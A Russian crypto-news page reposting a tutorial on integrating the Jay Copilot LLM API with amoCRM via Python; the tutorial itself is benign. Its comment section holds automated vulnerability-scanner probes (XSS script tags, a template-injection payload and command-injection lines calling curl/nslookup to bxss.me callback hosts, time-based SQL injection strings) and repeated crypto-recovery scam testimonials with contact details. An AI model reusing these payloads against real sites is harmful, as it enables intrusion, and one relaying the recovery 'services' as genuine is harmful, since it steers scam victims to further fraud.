Этот сайт использует файлы cookies. Продолжая просмотр страниц сайта, вы соглашаетесь с использованием файлов cookies. Если вам нужна дополнительная информация, пожалуйста, посетите страницу Политика файлов Cookie
Subscribe
Прямой эфир
Cryptocurrencies: 9512 / Markets: 114689
Market Cap: $ 3 787 132 962 593 / 24h Vol: $ 200 392 171 953 / BTC Dominance: 58.653467328398%

Н Новости

Хватит использовать AI-плагины! Как получить доступ к LLM-преимуществам через API Jay Copilot

Меня зовут Алексей Петров, я solution-инженер в компании Just AI. Сегодня многие разработчики столкнулись с необходимостью внедрения LLM в свои корпоративные сервисы. В этой статье я попробую доказать, почему интеграция API в данном случае гораздо эффективнее использования AI-плагинов, а также расскажу о том, как интегрировать API Jay Copilot в бизнес-процессы на примере интеграции amoCRM.

AI-плагины не про автоматизацию

С раскрытием потенциала LLM моделей пользователи все чаще делятся историями о том, как быстро и удобно они теперь решают сложные и трудоемкие рабочие задачи — от написания кода до подготовки презентаций.

Кажется, что переключение между AI-сервисами и своими документами не составляет сложности, но все же занимает какое-то время. И рано или поздно кто-то точно придет к вам в бэклог с задачей автоматизации этого процесса, и вы, как разработчик, столкнетесь с необходимостью внедрения языковых моделей в свои корпоративные сервисы.

В идеальном мире это была бы разовая активность с нативной интеграцией одной модели, которая решит все потребности бизнеса. Но с большей вероятностью вам придется оценить и подробно изучить документацию к нескольким сервисам, сравнить их, понять, что не все из них имеют точки для интеграции, покопаться на гитхабе в поисках чего-то похожего, но условно-бесплатного, протестировать промпты, применить продуктовое мышление и понять, зачем мы вообще внедряем эти сервисы в наш старенький самописный сервис или CRM, а когда более важные задачи начнут поджимать по срокам, вы отправите вашего идейного вдохновителя в бесконечный цикл copy-paste из одного фронта в другой.

Мы решали похожие рутинные задачи и не переставали верить в идеальный мир с одним эндпоинтом. Как вы уже поняли из названия, решение нашлось, благодаря сервису Jay Copilot и его внешнему API.

Что такое Jay Copilot?

Это платформа для удобного использования генеративного ИИ в работе и повседневных задачах. Под капотом в Jay Copilot используются нейросети и сервисы, например: GPT-3.5 и GPT-4, YaGPT-2, GigaChat, Stable Diffusion и DALL·E 3, Whisper, Aimyvoice и собственная языковая модель Just AI, JustGPT.

Jay Copilot объединяет функции этих нейросетей в виде готовых приложений: Анализ файла, Подкасты, Создание документа по образцу, Иллюстратор, Краткое содержание, Поиск по сайту, Программист, Маркетинговое письмо и т.д. И несколько отраслевых бизнес-решений: Аналитик данных, База знаний, Написание вакансии и Анализ отзывов.
Про механику работы этих приложениями можно почитать в документации: https://help.jaycopilot.com/docs/

У сервиса также существует API, на базе которого можно реализовать сложные кейсы с интеграцией в сторонние системы и сервисы. API предоставляет возможность загружать, получать и удалять файлы, получать список шаблонов приложений, получать список приложений и избранных приложений, получать и удалять диалоги, обновлять диалоги, получать историю сообщений диалога, и отправлять сообщения в диалог.

C чего начать работу с API?

В первую очередь стоит начать с изучения возможностей: https://help.jaycopilot.com
Напишите нам в техподдержку: [email protected] для получения ключа API Jay Copilot, указав ваш аккаунт на платформе.

b310db44df47401b487d2546b44bcb51.png

Пример интеграции с CRM

Давайте разберем интеграцию с CRM и Jay Copilot на примере бизнес-кейса.

Описание:
— Менеджер создает лид в CRM;
— Документы загружены в раздел «Файлы» в CRM;
— Cкрипт обращается в CRM и получает URL документа(ов);
— В Jay создается навык, подходящий для анализа документа;
— При создании навыка в параметрах указывается URL Документа из CRM и вопросы, на которые необходимо ответить навыку;
— В результате выполнения скрипта в сделку записывается примечание с ответами на вопросы по документу.

Преднастройки и вспомогательные функции:
— Python 3;
— requests для отправки запросов в сервисы;
— Функция для чтения токенов;
— Доступ в amo crm и работа с token;
— Доступ в Jay API и работа с token;
— Опционально: используем библиотеку amocrm.v2 для работы с amocrm (в примере будет использоваться Tokens, Lead) https://github.com/andrey-tech/amocrm-api-v2-docs

Кодим?

Функции для работы с запросами:

import requests

def handle_response(response):
    if response.status_code == 200:
        return response.json()
    else:
        return response.text  
    
## Блок кода проверяет ответ от сервера после отправки запроса. 
## Если все прошло хорошо (код ответа 200), то он возвращает данные этого ответа в формате JSON. 
## Если что-то пошло не так (код ответа отличается от 200), то возвращает текст ответа, который может содержать информацию об ошибке.
    
def read_token_from_file(filename):
    with open(filename, 'r') as file:
        return file.read().strip()
    
## Блок кода для работы с токенами которые хранятся в файлах: открывает файл с указанным именем и читает из него информацию. 
## Информация, которую он прочитал из файла, возвращается как результат работы функции. 
## Все лишние пробелы в начале и конце строки удаляются.

Сделаем доступ по API до CRM

Сначала преднастройки. В AMO можно создать тестовую учетку на 14 дней, и там все сразу доступно, включая интеграции. В админской учетке есть возможность провалиться в настройки и получить токен доступа для нашего кастомного приложения или выбрать какой-то готовый коннектор в маркетплейсе. В AMO CRM это настраивается в разделе амоМаркет.

ec2d71c32fd8f4924d1e4da60588ae92.png

Справа сверху есть раздел webhooks, нужно нажать на троеточие и выбрать «создать интеграцию» и выбрать «внешняя интеграция».

0a92ff4a1b18bdec07a26d82de3b3b6b.png

При создании из обязательных полей нам нужен только адрес. Можно даже написать localhost. Но мы возьмем адрес Jay Copilot. Так как AMO проверяет доступность домена, как обязательное условие для работы интеграции.

Нажимаем создать и видим, что у нас в установленных интеграциях появилась новая. Но этот коннектор пока отключен. Кликаем на него и проваливаемся в настройки. Видим наше описание и ключи доступа.

Кстати, небольшой оффтоп: вы можете также найти информацию про подключение своих интеграций в AMO, где говорится, что нужно идти в настройки ЛК и там выпускать bearer токен, но это чуть устаревшая информация. Раньше тут действительно был механизм API ключей, но со слов поддержки CRM он устарел и имел множество недостатков. Поэтому они перешли на механизм [[oAuth2.0]].

4ccee908b4998d108be8bed15206cb21.png

Ключи доступа нам чуть позже понадобятся, пока мы кликнем включить и отключить. Когда нажмем «установить», то появится статус интеграции «установлено», и это значит, что наш коннектор готов к использованию.

Далее мы уже можем через API интерфейс обращаться к нашей CRM. Но тут есть нюанс.

В документации разработчиков AMO CRM пишут, что нормальная библиотека, которую поддерживает вендор этой CRM самостоятельно, есть только для PHP, но, думаю, писать код сейчас на PHP мы не будем, поэтому для скорости демонстрации возьмем примеры на Python и готовую библиотеку. Благо, что комьюнити разработчиков у этой CRM действительно большое, и примеры всегда можно найти.

Например, ниже будет пару примеров из мануала, который я нашел на Youtube на канале Сеньор Джуниор: https://www.youtube.com/watch?v=rbwvOOwZxGo

Я возьму одноименную библиотеку amocrm-api https://pypi.org/project/amocrm-api/2.6.1/

Судя по обновлениям она поддерживается и довольно легко устанавливается.
Судя по обновлениям она поддерживается и довольно легко устанавливается.

Теперь кодим

Итак, давайте уже напишем немного кода а-ля приложение или AI-агента, который будет ходить как в CRM, так и в API Jay Copilot. Приложению нужно авторизоваться.
Далеко ходить не будем, возьмем метод с токенами из библиотеки для авторизации в amocrm:

##     Данный блок кода предназначен для подключения к сервису AMO CRM через API.
##     Переменные в начале кода - это уникальные ключи и адреса, которые нужны для того, чтобы программа могла войти в ваш аккаунт на сервисе AMO CRM.
##     Библиотека amocrm.v2 помогает программе работать с этими ключами и авторизоваться в системе AMO CRM.
##     Функция default_token_manager создает менеджер токенов, который используется для авторизации в AMO CRM.
##     После выполнения кода, программа сохранит два ключа доступа в два файла: access_token.txt и refresh_token.txt. 
##     Эти ключи будут использоваться для авторизации в AMO CRM при следующих запросах к API.

subdomain="" ##субдомен
client_id="" ## ID интеграции 
client_secret="" ##Секретный ключ
redirect_url="" ## URL который указан в интеграции (в нашем примере https://app.jaycopilot.com/)
refresh_token = ''
## в refresh_token - указывается тот длиииинный код авторизации (действительный 20 мин)"

from amocrm.v2 import tokens

if __name__ == '__main__':

    tokens.default_token_manager( client_id, client_secret, subdomain, redirect_url, 
        storage=tokens.FileTokensStorage(), ## by default FileTokensStorage
        )

    tokens.default_token_manager.init(refresh_token, skip_error=False) 

# Получение нового access token с использованием refresh token
def refresh_access_token():
    token_url = f'https://{subdomain}.amocrm.ru/oauth2/access_token'
    data = {
        'client_id': client_id,
        'client_secret': client_secret,
        'grant_type': 'refresh_token',
        'refresh_token': read_token_from_file('refresh_token.txt')
    }
    response = requests.post(token_url, data=data)
    return response.json().get('access_token')

# Формируем заголовки для запроса в AMOCRM
headers = {
    'Content-Type': 'application/json',
    'Authorization': f'Bearer {read_token_from_file("access_token.txt")}'
}

Заполним параметры, где client id = ID интеграции, client_secret = Секретный ключ, subdomain = ваш домен, т.е. те данные, которые в браузере в строке написаны до .amocrm.ru/.., redirect_url это наш ранее указанный адрес, и самое основное это tokens.default_token_manager.init(code="" = временный код авторизации.

Например, так:

862215399871ef73dd134864d9872bc0.png

Когда первый раз запустите код, у вас в папке проекта появится access token и refresh token.

63bc2c45ec6b8b98d9ea7cf878223a7e.png

После этого нам уже можно будет не обновлять каждый раз 20-ти минутный токен, поэтому закомментим его:

##    tokens.default_token_manager.init(refresh_token, skip_error=False) 

Все, вы авторизовались. Можно написать первый тестовый запрос, допустим, проверить какие у нас там есть сделки.

## выполним простую проверку для того чтобы убедиться что мы получаем данные из AMO CRM.
## получим информацию о созданных сделках при помощи библиотеки amocrm.v2

from amocrm.v2 import Lead

leads = Lead.objects.all()

for _ in leads:
    print(_.name, _.id)

Еще один пример:

# Получение сущности сделки по её ID
# lead_id = 888423  # Замените на реальный ID вашей сделки
# lead = Lead.objects.all(object_id=lead_id)

# Мы просто возьмем первый
lead = list(Lead.objects.all())[0]
lead_id = lead.id

# Вывод основной информации о сделке
print("ID сделки:", lead.id)
print("Название сделки:", lead.name)
print("Создана:", lead.created_at)
print("Обновлена:", lead.updated_at)
print("Стоимость:", lead.price)

Немного отвлечемся от кода. Давайте загрузим документы в сделку или убедимся, что они там есть:

c710178e02ab532dd7603d4adb7e4162.png

Вернемся в код. Получим информацию о файлах в CRM:

# Формируем URL для запроса. Найдем файлы в сделке
url = f'https://{subdomain}.amocrm.ru/api/v4/leads/{lead_id}/files'

# Отправляем GET-запрос
response = requests.get(url, headers=headers)
response = handle_response(response)
response

Увидим на выходе что-то вроде:

{'_links': {'self': {'href': '

https://hostname.amocrm.ru/api/v4/leads/1738915/files?limit=50

'}},
'_embedded': {'files': [{'file_uuid': '8ab921e7-40c1-4323-9849-e87f48c5d9ad', 'id': 208995}]}}

# Получим uuid файлов 
file_uuids = [file["file_uuid"] for file in response["_embedded"]["files"]]
file_uuids
# получаем домен сервиса файлов 
url = f'https://{subdomain}.amocrm.ru/api/v4/account?with=drive_url'
response = requests.get(url, headers=headers)
response = handle_response(response)

drive_url = response['drive_url']
print(f"домен сервиса файлов: {drive_url}")

# получаем ссылочки на файлы по uuid
files = []
url = drive_url + '/v1.0/files/'
for uuid in file_uuids:
    response = requests.get(url + uuid, headers=headers)
    response = handle_response(response)
    files.append({
        'name': response['name'],
        'url': response['_links']['download']['href']
    })

files

Этот блок кода должен вернуть в ответ имя и точный Url Документа из сделки в CRM.
Если все успешно, можно идти дальше уже в Jay.

Получим краткое содержание файлов при помощи Jay:

### Настроим доступ к Jay Copilot API

BASE_URL = 'https://app.jaycopilot.com/api/appsAdapter/' ### base url прода 
API_KEY = read_token_from_file('jay_api_key.txt') ## ключ

headers = {
    'Content-Type': 'application/json',
    'Accept': 'application/json',
    'X-API-KEY': API_KEY
}

В этом коде токена нет.
Возьмите его у техподдержки Just AI: [email protected]
Взяли? Отлично! Положите в txt файл в папку с проектом access_token.txt или укажите в коде.
Можно идти дальше.
Опциональный шаг:

# получим темплейты для приложений
response = requests.get(BASE_URL + "templates/", headers=headers)
print(response
response = handle_response(response)
print(str(response)[:500] + "<...>")
templates = response["templates"]

Еще один опциональный шаг:

# посмотрим список темплейтов
for (templateName, templateData) in templates.items():
        print(templateName + ": " + templateData["info"]["title"])

Последний опциональный шаг, обещаю:

# Посмотрим настройки темплейта Jay: Краткое содержание. 
templateName = "summarizer"
templates[templateName]

Все, можно создавать приложение с диалогом:

# создадим диалог с приложением "Краткий пересказ" и запустим приложение c первым файлом из сделки (Без предварительной загрузки файлов)
body = {
    'app': {
        'template': 'summarizer',
        'params': {
            'language': 'Russian',
            'fields': 'Содержание',
            'sentences': 4,
            'documentToSummarize': [files[0]['url']]
        }
    }
}
response = requests.post(BASE_URL + "conversations/", headers=headers, json=body)
response = handle_response(response)
response

Видите ответ? Посмотрите внимательно на этот Json — это параметры. Далее:

# запомним id диалога и приложения
conversationId = response["id"]
appId = response["app"]["id"]
appId
# сохраним ответ приложения из response в переменную summary и немного отформатируем

summary = []
summary.append(files[0]["name"] + ":\n" + response["history"][0]["content"][0]["text"])
print(summary[0])

Получили саммари. Можно идти обратно в CRM и записывать его.
Уберите пальцы от ctrl+c, запишем по API :)

## Запишем ответ от Jay в notes нашей сделки
lead.notes(text="\n\n".join(summary)).save()

## Прочитаем записанное
list(lead.notes.objects.all())[-1]

Все, вы молодец! Вы получаете бонусный код.
Создайте новый имя-файл.py

Можно пообщаться напрямую с ChatGPT, как настоящий hackerman в командной строке.

import requests
import os

def read_token_from_file(filename):
    with open(filename, 'r') as file:
        return file.read().strip()
    
API_KEY = read_token_from_file('jay_api_key.txt') ## ключ
#или
#API_KEY = 'your token'
BASE_URL = 'https://app.jaycopilot.com/api/appsAdapter/'


headers = {
    'Content-Type': 'application/json',
    'Accept': 'application/json',
    'X-API-KEY': API_KEY
}

def handle_response(response):
    if response.status_code == 200:
        return response.json()
    else:
        return response.text 
    

# проверим, есть ли уже диалог с приложением
conversations = requests.get(BASE_URL + "conversations", headers=headers)
conversations = handle_response(conversations)
gpt_conversations = list(filter(lambda conv: conv["app"]["template"] == "directLLM", conversations["conversations"]))

if len(gpt_conversations) > 0:
    conversationId = gpt_conversations[0]["id"]
    print("Найден существующий диалог. id: " + conversationId)
else:
    # создадим диалог с приложением (запустим приложение)
    body = {
        "app": {
            "template": "directLLM",
            "params": {'model': 'gpt-3.5-turbo'}
        }
    }
    response = requests.post(BASE_URL + "conversations/", headers=headers, json=body)
    response = handle_response(response)
    conversationId = response["id"]
    print("Создан новый диалог. id: " + conversationId)

print("Напишите exit, чтобы выйти")

while True:
    message = input("Клиент: ")
    if message == "exit":
        break
    response = requests.post(BASE_URL + "conversations/" + conversationId + "/message", headers=headers, json={"text": message})
    response = handle_response(response)
    print("Бот: " + response["content"][0]["text"])

FAQ

Как ничего не работает? У меня на компьютере все работает :)
Но я могу поделиться jupyter notebook c этим кодом — пишите на почту: [email protected] или @palexe на Хабре.

Источник

  • 09.10.25 08:09 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:09 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:09 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:09 pHqghUme

    e

  • 09.10.25 08:11 pHqghUme

    e

  • 09.10.25 08:11 pHqghUme

    e

  • 09.10.25 08:11 pHqghUme

    e

  • 09.10.25 08:11 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:12 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:12 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:12 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:13 pHqghUme

    can I ask you a question please?'"()&%<zzz><ScRiPt >6BEP(9887)</ScRiPt>

  • 09.10.25 08:13 pHqghUme

    {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hityjalvnplljd6041.bxss.me")}}

  • 09.10.25 08:13 pHqghUme

    '"()&%<zzz><ScRiPt >6BEP(9632)</ScRiPt>

  • 09.10.25 08:13 pHqghUme

    can I ask you a question please?9425407

  • 09.10.25 08:13 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:14 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:16 pHqghUme

    e

  • 09.10.25 08:17 pHqghUme

    e

  • 09.10.25 08:17 pHqghUme

    e

  • 09.10.25 08:17 pHqghUme

    "+response.write(9043995*9352716)+"

  • 09.10.25 08:17 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:17 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:17 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:18 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:18 pHqghUme

    $(nslookup -q=cname hitconyljxgbe60e2b.bxss.me||curl hitconyljxgbe60e2b.bxss.me)

  • 09.10.25 08:18 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:18 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:18 pHqghUme

    |(nslookup -q=cname hitrwbjjcbfsjdad83.bxss.me||curl hitrwbjjcbfsjdad83.bxss.me)

  • 09.10.25 08:18 pHqghUme

    |(nslookup${IFS}-q${IFS}cname${IFS}hitmawkdrqdgobcdfd.bxss.me||curl${IFS}hitmawkdrqdgobcdfd.bxss.me)

  • 09.10.25 08:18 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:19 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:20 pHqghUme

    e

  • 09.10.25 08:20 pHqghUme

    e

  • 09.10.25 08:21 pHqghUme

    e

  • 09.10.25 08:21 pHqghUme

    e

  • 09.10.25 08:21 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:22 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:22 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:22 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:22 pHqghUme

    if(now()=sysdate(),sleep(15),0)

  • 09.10.25 08:22 pHqghUme

    can I ask you a question please?0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  • 09.10.25 08:23 pHqghUme

    can I ask you a question please?0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  • 09.10.25 08:23 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:23 pHqghUme

    (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  • 09.10.25 08:24 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:24 pHqghUme

    e

  • 09.10.25 08:24 pHqghUme

    can I ask you a question please?-1 waitfor delay '0:0:15' --

  • 09.10.25 08:25 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:25 pHqghUme

    e

  • 09.10.25 08:25 pHqghUme

    e

  • 09.10.25 08:25 pHqghUme

    e

  • 09.10.25 08:25 pHqghUme

    can I ask you a question please?9IDOn7ik'; waitfor delay '0:0:15' --

  • 09.10.25 08:26 pHqghUme

    can I ask you a question please?MQOVJH7P' OR 921=(SELECT 921 FROM PG_SLEEP(15))--

  • 09.10.25 08:26 pHqghUme

    e

  • 09.10.25 08:27 pHqghUme

    can I ask you a question please?64e1xqge') OR 107=(SELECT 107 FROM PG_SLEEP(15))--

  • 09.10.25 08:27 pHqghUme

    can I ask you a question please?ODDe7Ze5')) OR 82=(SELECT 82 FROM PG_SLEEP(15))--

  • 09.10.25 08:28 pHqghUme

    can I ask you a question please?'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  • 09.10.25 08:28 pHqghUme

    can I ask you a question please?'"

  • 09.10.25 08:28 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:28 pHqghUme

    @@olQP6

  • 09.10.25 08:28 pHqghUme

    (select 198766*667891 from DUAL)

  • 09.10.25 08:28 pHqghUme

    (select 198766*667891)

  • 09.10.25 08:30 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:33 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:34 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:34 pHqghUme

    if(now()=sysdate(),sleep(15),0)

  • 09.10.25 08:35 pHqghUme

    e

  • 09.10.25 08:36 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:36 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:37 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:37 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:37 pHqghUme

    e

  • 09.10.25 08:37 pHqghUme

    e

  • 09.10.25 08:40 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:40 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:41 pHqghUme

    e

  • 09.10.25 08:41 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:42 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:42 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:42 pHqghUme

    e

  • 09.10.25 11:05 marcushenderson624

    Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 09.10.25 11:05 marcushenderson624

    Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 09.10.25 11:05 marcushenderson624

    Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 09.10.25 11:05 marcushenderson624

    Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 11.10.25 04:41 luciajessy3

    Don’t be deceived by different testimonies online that is most likely wrong. I have made use of several recovery options that got me disappointed at the end of the day but I must confess that the tech genius I eventually found is the best out here. It’s better you devise your time to find the valid professional that can help you recover your stolen or lost crypto such as bitcoins rather than falling victim of other amateur hackers that cannot get the job done. ADAMWILSON . TRADING @ CONSULTANT COM / WHATSAPP ; +1 (603) 702 ( 4335 ) is the most reliable and authentic blockchain tech expert you can work with to recover what you lost to scammers. They helped me get back on my feet and I’m very grateful for that. Contact their email today to recover your lost coins ASAP…

  • 11.10.25 10:44 Tonerdomark

    A thief took my Dogecoin and wrecked my life. Then Mr. Sylvester stepped in and changed everything. He got back €211,000 for me, every single cent of my gains. His calm confidence and strong tech skills rebuilt my trust. Thanks to him, I recovered my cash with no issues. After months of stress, I felt huge relief. I had full faith in him. If a scam stole your money, reach out to him today at { yt7cracker@gmail . com } His help sparked my full turnaround.

  • 12.10.25 01:12 harristhomas7376

    "In the crypto world, this is great news I want to share. Last year, I fell victim to a scam disguised as a safe investment option. I have invested in crypto trading platforms for about 10yrs thinking I was ensuring myself a retirement income, only to find that all my assets were either frozen, I believed my assets were secure — until I discovered that my BTC funds had been frozen and withdrawals were impossible. It was a devastating moment when I realized I had been scammed, and I thought my Bitcoin was gone forever, Everything changed when a close friend recommended the Capital Crypto Recover Service. Their professionalism, expertise, and dedication enabled me to recover my lost Bitcoin funds back — more than €560.000 DEM to my BTC wallet. What once felt impossible became a reality thanks to their support. If you have lost Bitcoin through scams, hacking, failed withdrawals, or similar challenges, don’t lose hope. I strongly recommend Capital Crypto Recover Service to anyone seeking a reliable and effective solution for recovering any wallet assets. They have a proven track record of successful reputation in recovering lost password assets for their clients and can help you navigate the process of recovering your funds. Don’t let scammers get away with your hard-earned money – contact Email: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Contact: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 12.10.25 01:12 harristhomas7376

    "In the crypto world, this is great news I want to share. Last year, I fell victim to a scam disguised as a safe investment option. I have invested in crypto trading platforms for about 10yrs thinking I was ensuring myself a retirement income, only to find that all my assets were either frozen, I believed my assets were secure — until I discovered that my BTC funds had been frozen and withdrawals were impossible. It was a devastating moment when I realized I had been scammed, and I thought my Bitcoin was gone forever, Everything changed when a close friend recommended the Capital Crypto Recover Service. Their professionalism, expertise, and dedication enabled me to recover my lost Bitcoin funds back — more than €560.000 DEM to my BTC wallet. What once felt impossible became a reality thanks to their support. If you have lost Bitcoin through scams, hacking, failed withdrawals, or similar challenges, don’t lose hope. I strongly recommend Capital Crypto Recover Service to anyone seeking a reliable and effective solution for recovering any wallet assets. They have a proven track record of successful reputation in recovering lost password assets for their clients and can help you navigate the process of recovering your funds. Don’t let scammers get away with your hard-earned money – contact Email: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Contact: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 12.10.25 19:53 Tonerdomark

    A crook swiped my Dogecoin. It ruined my whole world. Then Mr. Sylvester showed up. He fixed it all. He pulled back €211,000 for me. Not one cent missing from my profits. His steady cool and sharp tech know-how won back my trust. I got my money smooth and sound. After endless worry, relief hit me hard. I trusted him completely. Lost cash to a scam? Hit him up now at { yt7cracker@gmail . com }. His aid turned my life around. WhatsApp at +1 512 577 7957.

  • 12.10.25 21:36 blessing

    Writing this review is a joy. Marie has provided excellent service ever since I started working with her in early 2018. I was worried I wouldn't be able to get my coins back after they were stolen by hackers. I had no idea where to begin, therefore it was a nightmare for me. However, things became easier for me after my friend sent me to [email protected] and +1 7127594675 on WhatsApp. I'm happy that she was able to retrieve my bitcoin so that I could resume trading.

  • 13.10.25 01:11 elizabethrush89

    God bless Capital Crypto Recover Services for the marvelous work you did in my life, I have learned the hard way that even the most sensible investors can fall victim to scams. When my USD was stolen, for anyone who has fallen victim to one of the bitcoin binary investment scams that are currently ongoing, I felt betrayal and upset. But then I was reading a post on site when I saw a testimony of Wendy Taylor online who recommended that Capital Crypto Recovery has helped her recover scammed funds within 24 hours. after reaching out to this cyber security firm that was able to help me recover my stolen digital assets and bitcoin. I’m genuinely blown away by their amazing service and professionalism. I never imagined I’d be able to get my money back until I complained to Capital Crypto Recovery Services about my difficulties and gave all of the necessary paperwork. I was astounded that it took them 12 hours to reclaim my stolen money back. Without a doubt, my USDT assets were successfully recovered from the scam platform, Thank you so much Sir, I strongly recommend Capital Crypto Recover for any of your bitcoin recovery, digital funds recovery, hacking, and cybersecurity concerns. You reach them Call/Text Number +1 (336)390-6684 His Email: [email protected] Contact Telegram: @Capitalcryptorecover Via Contact: [email protected] His website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 13.10.25 01:11 elizabethrush89

    God bless Capital Crypto Recover Services for the marvelous work you did in my life, I have learned the hard way that even the most sensible investors can fall victim to scams. When my USD was stolen, for anyone who has fallen victim to one of the bitcoin binary investment scams that are currently ongoing, I felt betrayal and upset. But then I was reading a post on site when I saw a testimony of Wendy Taylor online who recommended that Capital Crypto Recovery has helped her recover scammed funds within 24 hours. after reaching out to this cyber security firm that was able to help me recover my stolen digital assets and bitcoin. I’m genuinely blown away by their amazing service and professionalism. I never imagined I’d be able to get my money back until I complained to Capital Crypto Recovery Services about my difficulties and gave all of the necessary paperwork. I was astounded that it took them 12 hours to reclaim my stolen money back. Without a doubt, my USDT assets were successfully recovered from the scam platform, Thank you so much Sir, I strongly recommend Capital Crypto Recover for any of your bitcoin recovery, digital funds recovery, hacking, and cybersecurity concerns. You reach them Call/Text Number +1 (336)390-6684 His Email: [email protected] Contact Telegram: @Capitalcryptorecover Via Contact: [email protected] His website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 14.10.25 01:15 tyleradams

